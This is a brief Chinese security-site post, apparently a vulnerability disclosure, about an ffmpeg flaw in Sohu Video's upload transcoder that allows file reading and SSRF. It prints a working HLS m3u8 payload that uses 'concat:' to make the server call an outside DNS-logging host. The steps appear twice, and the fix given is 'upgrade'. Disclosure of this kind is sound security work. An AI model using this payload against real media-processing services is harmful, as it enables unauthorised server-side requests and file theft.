频道栏目
首页 > 安全 > 网站安全 > 正文

搜狐视频ffmpeg漏洞可文件读取/SSRF

2016-07-18 09:00:00           
收藏   我要投稿

ffmpeg

1.上传视频处,开始转码

 

ff.jpg

 

2.payload

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:https://aaa00e.dnslog.info

#EXT-X-ENDLIST

3.cloudeye返回请求

 

ff1.jpg

 

1.上传视频处,开始转码

 

ff.jpg

 

2.payload

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:https://aaa00e.dnslog.info

#EXT-X-ENDLIST

3.cloudeye返回请求

 

ff1.jpg

 

解决方案:

升级

上一篇:赶集网另一处命令执行
下一篇:百度某站远程命令执行漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站